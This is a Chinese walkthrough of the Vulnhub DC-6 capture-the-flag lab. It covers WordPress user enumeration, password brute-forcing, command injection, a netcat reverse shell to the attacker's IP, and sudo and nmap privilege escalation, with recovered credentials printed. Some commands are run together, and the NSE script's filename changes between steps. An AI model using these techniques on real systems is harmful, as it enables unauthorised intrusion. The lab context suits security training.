前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Vulnhub】DC-6

【Vulnhub】DC-6

作者头像
yichen
发布2020-05-14 20:10:34
3700
发布2020-05-14 20:10:34
举报

nmap 扫描一下

nmap -A -p- 192.168.149.164

vim /etc/hosts

加上 192.168.149.164 wordy

访问 80 端口,发现是一个 wordpress 的站点

用 wpscan 扫描一下,发现了几个用户名

代码语言:javascript
复制
wpscan --url http://wordy -ru

在靶机下载的页面,根据作者善意提醒,制作一份密码字典

代码语言:javascript
复制
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

把扫描出来的用户名也保存出来,爆破一下

代码语言:javascript
复制
wpscan --url http://wordy -U users.txt -P passwords.txt

找到账户密码:mark/helpdesk01

登录后,后台的一个工具里面有个功能,存在命令执行漏洞

用 burp 抓一下包,看一下,在后面加上个 ;ls 成功回显了目录下的文件

nc 来拿一个 shell 吧

先 kali 里面 nc -lp 6666

访问的时候加上

代码语言:javascript
复制
; nc 192.168.149.141 6666 -e /bin/sh
代码语言:javascript
复制
python -c "import pty;pty.spawn('/bin/bash')" 

开启一个好看点的 shell

在 mark 的目录下找到了一个用户名和密码 graham/GSo7isUM1D4

这个账户可以直接 ssh 登进来

代码语言:javascript
复制
ssh graham@192.168.149.164

登陆以后,sudo -l 发现一个不需要密码就可以用的

在后面追加一个 /bin/bash,这样运行的时候就能拿到 jens 的 shell 了

代码语言:javascript
复制
echo "/bin/bash" >> /home/jens/backups.shsudo -u jens /home/jens/backups.sh

再找一下,这次是 nmap

可以写个脚本,让 nmap 来执行脚本,然后拿到 shell

代码语言:javascript
复制
echo 'os.execute("/bin/sh")' > shell.nsesudo nmap --script getroot.nse
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-05-04,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 陈冠男的游戏人生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档